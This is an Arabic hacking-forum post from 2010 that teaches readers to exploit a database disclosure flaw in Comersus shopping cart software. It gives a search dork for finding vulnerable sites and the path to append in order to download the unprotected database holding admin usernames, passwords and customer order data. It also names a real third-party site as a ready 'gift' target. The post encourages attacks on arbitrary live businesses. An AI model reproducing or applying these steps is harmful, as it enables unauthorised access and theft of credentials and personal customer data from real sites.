:: vBspiders Professional Network :: - عرض مشاركة واحدة - مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...

Dr.NaNo · 03-30-2010, 03:59 PM

السلام عليكم ورحمه الله وبركاته ...

كيفكم ياحلوين اكيد بخير ، << دوم يارب ..

قبل لا ادخل في الموضوع ياريت [ الادارة تفتح قســم خاص بشروحات الثغرات عشان اشرح لكم ] ...

المهم ندخل في صلب الموضوع . ما ابي اطول عليـــكم ..

بسم الله الرحمن الرحيــم ..

اولا هذا موقع الثغره .. للي مايعرف الموقع تبع الثغرات .. :d

www.exploit-db.com

طبعــا موقع >>:

www.MilW0rM.com

^_^ مغلق له 8 شهــور تقريبــأ ....

خلوكم على هذا افضل ..>>:

www.exploit-db.com

نكمل الشرح ..

هذي الثغره الي تخليك تحمل الملف تبع الموقع وفيه معلومات الادمن خخخخخ

http://www.exploit-db.com/exploits/11931

وبشرحهــا لكم ..

الثغره .:

اقتباس


	# Title: Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability # EDB-ID: 11931 # CVE-ID: () # OSVDB-ID: () # Author: indoushka # Published: 2010-03-29 # Verified: yes # Download Exploit Code # Download Vulnerable app view source print ? ================================================== ====================================== \| # Title : Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability \| # Author : indoushka \| # Home : www.iqs3cur1ty.com \| # Bug : Database Disclosure ====================== Exploit By indoushka ================================= # Exploit : 1- http://127.0.0.1/Comersus/database/comersus.mdb # Brief Description: By default, comersus.mdb isn't password-protected, and contains the following sensitive information: - order information (buyer's address, phone, order status, tracking #, obs, etc) - settings (encryption password, admin email, company information, etc) - shipments - etc Enough to cause damage for the business if any of that information is obtained. Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net --------------------------------------------------------------------------------------------------------------

اولا .: الدورك ..:

inurl:Asp - comersus7F

واتحداك تحصل الدورك في الثغرة خخخخخخخخخخخخخخخخ

طيب نجي للإستغلال .. مكتوب في الثغره .:

http://127.0.0.1/Comersus/database/comersus.mdb

هذا الاستغلال .. خـطا .. انا اشوف ، انه خـطا ..

وهذا الصحيح ..

http://www.Dr.NaNo.com/comersus7F/database/comersus.mdb

ركزو معي ..:

اكتبو بعد رابط الموقع هذا المسار بس ..:

comersus7F/database/comersus.mdb

وراح يجيك ملف حمله وبتحصل فيه اليوزر والباسورد ههههههههه لوووول

وهذا موقع هدية مني لكم ... :D

كود PHP:

  http://www.totalhealthantiageingclinic.com.au/comersus7F/database/comersus.mdb

################################

الي مافهم ...: < راح افهمــه

رح خذ [ الدورك ] الي فوق ..

وبتطلع لك مواقع بالهبل .. مثل شعر قروشــة .. هههههههههههههههههه

بعدين اختر اي موقع ..:

وامسح الكلام كله. وخل الرابــط كذا

www.xxxx.com

بس واكتب وراه على طول هذا المسار ..:

comersus7F/database/comersus.mdb

وخلاص انتهى ياشنب ...بجيك تحميل حمل وافتحه وبتحصل الباسورد واليورز .. وبس ..:

:D

أنتهى الشششششششششششششششششرح :00001793[1]:

لووووووووووووووول :icon555:

الشــــرح اهـــــداء الى ..:

فريق كلاشنكوف .

والهيكل الارزق .

ودوم البطل .

وسنايبر غزة .

وقروشـة .

ومين كمان ؟ نسيت الباقين والله ..

وإهداء لكل العنــــــــاكـــــب ... < عشان ماحد يزعل ..

تحياتي لكم اخواكم ./

Dr.NaNo

المصدر: :: vBspiders Professional Network ::

lu Dr>NaNo F juhg plg hglgt jfu hgl,ru >> ,Yojvr >>>>> g,,,,,,,,g D>>>